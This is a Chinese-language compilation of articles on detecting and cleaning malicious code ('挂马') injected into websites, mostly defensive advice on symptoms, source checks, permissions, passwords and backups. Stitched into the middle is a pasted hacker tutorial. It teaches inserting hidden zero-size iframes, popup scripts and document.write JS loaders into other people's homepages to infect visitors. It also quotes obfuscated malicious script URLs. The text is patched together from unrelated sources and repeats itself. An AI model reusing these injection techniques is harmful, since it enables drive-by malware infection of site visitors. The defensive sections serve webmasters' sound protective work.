专家教你如何轻松检测与清除网站挂马(图文并茂)

终极网站挂马检测工具(网站被挂马怎么办)之前做一些淘客站，一些小站，也都没有在意过检查网站挂马！总觉得应该没有人会给我的网站挂马，现在做了一些正规站，一些商城，所有的东西都要考虑了。

一不小心网站被挂马，我那些数据可就麻烦大了啊，还有网站的排名恐怕也难保了。

所以今天就收集了一些资料，全部整理了一下，然后给自己的网站都运用上了。

具体网站被挂马怎么办大家可以看我下面的介绍！一，网站被挂马有什么危害？1，网站被搜索引擎（google，百度等）屏蔽，影响SEO流量。

2，网站被杀软查杀或屏蔽。

3，网站成为木马散布点。

4，严重危害用户各种账号安全，影响自身公众信誉度。

5，网站的数据受到影响。

6，网站本身操作SEO的话，会对网站权重受到影响。

二，网站被挂马在搜索引擎和浏览器中被拦截的情况：百度搜索后网站被挂马情况：谷歌搜索后网站被挂马情况360浏览器网站挂马检测情况火狐浏览器网站挂马检测情况Googel浏览器网站挂马检测情况三，如何判断网站被挂马，网站被攻击？如果检查你的网站时候存在下列问题，则说明你的网站可能已经被黑客攻击：1、通过Site语法查询站点，显示搜索引擎收录了大量非本站应有的页面。

2、从百度搜索结果中点击站点的页面，跳转到了其他站点。

3、站点内容在搜索结果中被提示存在风险。

4、从搜索引擎带来的流量短时间内异常暴增。

注：site查询结合一些常见的色情、游戏、境外博彩类关键字，可帮助站长更快的找到异常页面，例如“site: 博彩”一旦发现上述异常，我们建议您立即对网站进行排查。

包括：1、分析系统和服务器日志，检查自己站点的页面数量、用户访问流量等是否有异常波动，是否存在异常访问或操作日志；2、检查网站文件是否有不正常的修改，尤其是首页等重点页面；3、网站页面是否引用了未知站点的资源（图片、JS等），是否被放置了异常链接；4、检查网站是否有不正常增加的文件或目录；5、检查网站目录中是否有非管理员打包的网站源码、未知txt文件等。

挂马攻击挂马攻击是指攻击者在已经获得控制权的网站的网页中嵌入恶意代码（通常是通过IFrame、Script引用来实现），当用户访问该网页时，嵌入的恶意代码利用浏览器本身的漏洞、第三方ActiveX漏洞或者其它插件（如Flash、PDF插件等）漏洞，在用户不知情的情况下下载并执行恶意木马。

挂马方式目前挂马的主要方式是通过IFrame与Script嵌入网马URL，比如下面的挂马代码：<iframe src=http://www.cq***.com/Img/ width=0 height=0></iframe>这里通过将IFrame的width与height设置为0，使得嵌入的网马URL在网页上不可见。

<script src=http://%68%68%6A%32***%63%6E></script>这里Script里的URL是经过URL encode编码的。

通过各种编码、混淆、客户端判断等方式来隐藏、保护网马是攻击者挂马常用的手段。

除了这两种常见的挂马方式外，还有如下几种：1、利用JavaScript执行各种经过编码、混淆的攻击代码进行挂马。

2、利用网页跳转、弹出新窗口等方式进行挂马。

3、利用Flash等媒体封装的方式进行挂马。

4、在CSS（层叠样式表）里可以执行JavaScript的浏览器中进行挂马。

挂马常见类型常见的几种类型如下：1、数据库挂马攻击者利用SQL注入漏洞将挂马代码注入到数据库的某些字段中，如果网站页面使用到这些字段的值，并且没做适当的过滤，就有可能导致用户访问该网站的页面时执行攻击者注入的代码。

2、文件挂马攻击者直接将挂马代码批量写入服务端文件里以达到整站挂马的目的。

3、ARP挂马在与目标站点同一局域网的情况下，攻击者可以通过控制局域网中任意一台主机计算机发起ARP欺骗，并将挂马代码注入到用户请求的响应页面上，从而达到隐蔽的挂马目的。

∙∙当前位置 : 主页 > 网络安全 > 黑客教程 >网页挂马详细步骤教程来源：互联网作者：佚名时间：04-30 13:19:33【大中小】点评：其实很简单的的，说到原理，就一个：就是在人家网站的主页那里插入一个自己的网马的页面，等有漏洞的人查看了人家网站的主页，那么他就成了你的肉鸡了。

下面我介绍5种方法，我一个一个介绍方法一：这个就是最简单的了，只要你懂点html语言把下面这段代码插进网页中：其实很简单的的，说到原理，就一个：就是在人家网站的主页那里插入一个自己的网马的页面，等有漏洞的人查看了人家网站的主页，那么他就成了你的肉鸡了。

下面我介绍5种方法，我一个一个介绍方法一：这个就是最简单的了，只要你懂点html语言把下面这段代码插进网页中：<iframe src="这里换成你的网马的地址" width="0" height="0"frameborder="0"></iframe>我来插入，理论上来说插到任何地方都行，只是不要把html语言给弄乱了就行本来没有插进去的页面就是这样，不知道网易那里有没有弹出的广告了，好我们运行，注意到网页的左下角的网址变化看到左下角了吧，那里在请求，说明我们插入进去的页面也运行了，哦，还有个弹出的窗口，给我的工具拦了，我来刷新一次，看到吧width="0" height="0" frameborder="0"就是大小高度的意思，我们把他设置为零，那我们就不能看到网页的内容了看下一种方法，把原来插进去的清理掉先，等下那个文件还要用方法二：这个就是脚本<SCRIPT language=javascript>window.open("/test.htm","","toolbar=no,location=no,directorie s=no,status=no,menubar=no,scrollbars=no,width=1,height=1");</script>我们做网页的时候就会加入很多网页特效，同样我们也可以用来打开我们的网马，那么浏览过机子就会中我们的网马了～学过java的都知道上面一段代码的意思了把！打开网站的同时也就打开了我们的/test.htm看我们插进去弹出的窗口给拦了，我去掉先，还是给拦了晕，有个窗口弹了出来，这样子的网马是不保险的……不过也不失为一种方法呃～改成0就更大的窗口了，好，方法而已，只是介绍，下一个方法三：还有一点就是比较隐蔽的那就是使用js文件document.write("<iframe width='0' height='0'src='/mm1.htm'></iframe>");document.write("<iframe width='0' height='0'src='/mm2.htm'></iframe>");我们没必要挂两个网马，就写一个好了额刚才写错位置了保存为mm.js，然后在首页里调用js脚本<script language="javascript" src="</script'>/mm.js"></script>这个就是调用的代码，从这里我们可以看到/mm.js，说明我们的mm.js 文件可以不传到主机上，这样可以方便我们批量管理我们挂马，传到我们的主页空间上就可以了不过我这里就不传了，就用本地的吧，运行左下角……调用了163的了，再刷新下，看清楚点，OK下一种方法方法五：再一种代码就是调用其他网页的页面文件,可以将下面的代码复制，保存为HTM文件。

如何检测网站是否被挂马
站长最头疼的一件事大概就是网站被挂马了吧！网站被挂马就说明网站的权限很可能已经落入到了其他人的手上，就好比这个网站里有什么都可能被别人知道，网站挂马还会给网站打来巨大的负面影响比如内容被篡改，用户体验变差，严重的可能还会发生企业机密数据泄露等风险，那么对于一个网站如何才能检测出是否被挂马了呢？
1、看网站打开首页是否会自动跳转到陌生页面，一般来说网站被挂马最明显的特征就是网站是否存在跳转到其网站链接，如果我们在用浏览器打开自己网站的时候发现网站突然跳转到陌生的页面，那么这个时候就要想一想是不是网站被挂马了。

可以通过手动检查的方式来常看网站源码，可以通过查找命令查看网以http开头是不是存在自己的链接。

如果源码中出现不是自己网站的链接也不是广告链接的话，站长就应该及时处理挂马了。

2、FTP
坑一通过FTP来参看服务器内文件是否有被修改，如果是网站被挂马而且黑客修改了网站文件，那么相应的文件修改时间也会发生变化，所以要是某些文件的修改时间比其他文件要晚，就说名可能该文件以及被黑客修改过了，也就是说网站以及被挂了木马了。

3、后台进不去
后台是方面管理员进行操作的，要是网站后台进不去，或者没有权限说明后台可能被篡改，也说明网站被挂了马。

4、查看网站收录
可以使用site命令来site一下网站，要是在搜索结果中发现有大量不属于网站的内容，就说明网站可能被挂了马。

有没有什么办法来预防呢
推荐使用一些在线检测挂马的工具，站长工具里也有。

还有就是ftp的用户期限要尽量最小化，重要的文件可以定期的检查是否被修改等等。

网站被挂马的解决途径有哪些？
网站被挂马的解决途径有哪些?
第一，降低网站文件夹权限
网站如果被挂马，第一时间可以将网站所在的文件夹权限更改至最低，也就是只保留读写权限，暂时关闭其他权限，这样只需要网站能够正常访问就可以了。

因为文件夹权限修改以后，黑客暂时就无法再次篡改网页，因此就防止了老问题没解决就出现新的问题。

但是如果是整台服务器都被黑，修改网站文件权限也是没有多少用处，这时需要对网站重新换空间。

第二，备份文件替换被挂马文件
文件夹权限修改后，就需要对挂马文件进行修改删除。

如果觉得麻烦，可以直接将之前备份的文件替换现在被挂马的文件。

为了确保可以替换每一个页面，可以先将空间清空后再上传，但是为什么要将空间清空呢?主要担心黑客可能上传自己的后门文件，如果这样的话，即使将文件替换也是没有多少作用的。

将空间清空既可以删除可能存在的后门文件，也可彻底替换每一个可能被挂马的页面，因此平时在维护网站的时候，学会对文件进行定期备份很有必要。

第三，帐号密码不能太过简单
账号密码主要包括空间FTP、网站后台以及数据库等涉及安全的账号密码，帐号密码设置时，切忌直接将域名作为账号与密码，最好可以大小写组合，不能全是数字，这样黑客破解起来非常容易。

帐号密码调整好以后再检查网站的.管理后台目录是否是默认的，如果是默认的类似admin这样的请做修改以防止黑客从后台入侵。

网站被挂马后，网站权重、流量、排名都会下降很多，对网站伤害是比较大的。

因此站长在平时工作中，需要定期对网站进行漏洞检查，或者查看网站源文件，并对网站后台设置好权限，只有这样网站才会有一个比较安全的状态。

分享站长快速检测网站是否被挂马的三方法网站被挂马或者被挂暗链说明网站的管理权限已落入他人之手，而且网站被挂马往往来给网站带来不可估量的负面影响，最常见的就是网站用户体验变形、网站被降权甚至是被K，而对于网站被马之后，很多站长都不能及时的发现并处理，导致网站出现状况后才有所感概。

那么站长应该如何去防范这个网站最大的杀手呢?站长如何去检查自己的网站是否被挂马了呢?今天笔者以亲身经历来谈谈如何检查网站是否被挂马的几个方法。

一、彻底检查法-手动检查网站源码对于站长检查网站是否被挂马，其中最简单的方法就是自己手动检查网站的源码，一般而言，网站被挂马最明显的特征是网站存在跳转到其他网站的链接，也就是网站被挂马之后一旦打开网站就会弹出不是自己的网站也不是广告页面的代码。

而咱们检查的时候就可以通过检查网站的首页源码开始。

首先查看网站首页的源码，然后通过查找命令以http://开头检查是否存在不是自己网站的链接。

通过手动查看源码，检查网站链接的方式是最彻底的检查网站是否被挂马的方法，如果网站源码中出现不是自己网站的链接或者是自己不熟悉的网址的时候，那么站长就要注意了，如果也不是广告链接的话，那么这个网址可能就是被挂马或者被挂暗链之后的跳转链接，而这说明网站的管理权限已经外露了，这时候站长就要及时的处理掉。

二、借助法-借助在线安全检测平台检查现在网络上出现了网站安全检测的第三方插件，而最以知名的就是瑞星联盟和360网站安全检测了，这两个网站在线检测平台对于咱们检查网站是否被挂马、是否安全有着非常大的帮助。

那么咱们想更深入的了解网站是否被挂马或者网站是否存在安全风险的时候就可以借助这类型的网站要深入了解自身网站的安全性，就拿360网站安全检测来举例子，首先需要一个帐号，因为只有登陆帐号并且对网站进行权限检测之后才能看到检查结果，一般检测的时间需要比较长，但好在是全自动进行的。

通过给网站来自全方位的源码进行检查完成后，系统就会把检测报告发到你的邮箱中，而且网站本身也有个报告说明，而咱们通过查看该报告所反馈的信息自然就可以对自己的网站是否被挂马了如指掌了。

巧妙利用百度站长平台死链工具删除被
百度收录的挂马网址
前一段时间，由于程序漏洞造成网页内容多处被挂博彩的内容信息，木马删除后，但是百度收录的挂马页面却都过去几个月了依然还是存在于是利用百度站长平台工具的死链提交将挂马页面删除。

下面就为大家分享一下详细的操作方法：
一、网站配置
我的网站挂马网页的网址全部为：/,登陆后在导航的左侧找到数据提交选项->死链提交，如下图：
下面我们要建立一下列链接文件，将你要删除的死链或是挂马链接全部写在这个文件里，格式如下：
将这个文件上传到网站的要目录，到百度站长平台提交这个文件的地址，如下图：
OK!提交以后就耐心等待百度处理吧!
文章由设计北京门户网提供()，转载请注明!
文章来源于：/article-21748-1.html。